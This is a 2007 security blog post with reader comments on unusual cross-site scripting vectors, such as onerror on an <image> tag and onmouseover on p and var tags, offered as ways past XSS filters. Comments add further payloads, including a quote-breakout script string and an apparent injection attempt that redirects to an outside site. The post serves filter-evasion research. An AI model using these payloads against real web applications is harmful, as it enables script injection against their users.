Unusual XSS vectors
Monday, 19 November 2007
I’ve been working on my Hackvertor script to include XSS fuzzing which isn’t ready yet but I thought you might be interested in a few interesting results I’ve found 🙂
First off I’m sure you know you can use XSS in a img object yeah? Well did you know there’s also a image object as well? It can be used like this:-
<image src="" onerror="alert(/XSS/)" />
Pretty neat eh? It may get round some XSS filters. It’s not in RSnake’s cheatsheet after a quick check.
Next up you can even inject Javascript into paragraph tags or obscure html tags like the following:-
<p onmouseover=alert(/XSS/)>Some very long paragraph goes here.</p>
Or what about this:-
<var onmouseover=alert(/XSS/)>Some very long paragraph goes here.</var>
Many other tags are supported using this method. That is all for now I hope you enjoyed this little post, I shall release my fuzzing research once the features have been completed in Hackvertor.
No. 1 — November 19th, 2007 at 12:30 pm
Wow – the <image> issue is new indeed. The rest is just plain browser madness – Firefox in particular.
<image/src onerror=alert(1)>
Incredible… Nice find 🙂 I await the day when Hackvertor hs an API with itching fingers 😉
No. 2 — November 19th, 2007 at 12:35 pm
Thanks Mario 🙂 I’ve registered a domain for Hackvertor and once I’ve finished the look behind matching and completed the fuzzing features I’ll start work on a API, which should be cool 😀
No. 3 — November 19th, 2007 at 4:31 pm
Cool! I wrote a http://www.tssci-security.com/archives/2007/11/15/blacklisting-xss-filter-evasion-and-other-resources/ a couple days ago about using <img src=”” onerror=alert(/xss/)> in a site review.. Didn’t even realize there was an <image> element that works the same.
I’m going to have to try the onmouseover attribute next time around.
Mario’s is a nice one too… I’m building up my own little cheat sheet as I go along. Perhaps XSS Cheat Sheet could use an update.
🙂
No. 4 — November 19th, 2007 at 5:11 pm
onwhatever 🙂
http://www.w3schools.com/dhtml/dhtml_events.asp
MSIE even features dozens of additional ones…
No. 5 — November 22nd, 2007 at 11:51 am
> It’s not in RSnake’s cheatsheet after a quick check.
But in his Book 😉
“Cross Site Scripting Attacks: Xss Exploits and Defenseâ€
HTH
No. 6 — November 22nd, 2007 at 12:13 pm
@Domber
He should update his cheatsheet then 🙂
No. 7 — August 4th, 2008 at 12:37 pm
An XSS attempt 🙂
<script>window.location = ‘http://www.reelic.za.net/’></script>
No. 8 — August 4th, 2008 at 12:37 pm
‘>”><script>alert(0)</script>
No. 9 — August 4th, 2008 at 1:30 pm
@Reelix
1. You’d be getting a XSS on wordpress and not me.
2. You didn’t get XSS
3. This is boring
No. 10 — August 15th, 2008 at 8:23 am
some filter is based on the HTML syntax,it will remove all attributs like on*,remove some unsafe tags and so on.
the filter just like a browser,and it’s safe much more.
No. 11 — January 6th, 2010 at 1:32 pm
<image src=”” onerror=”alert(/XSS/)” />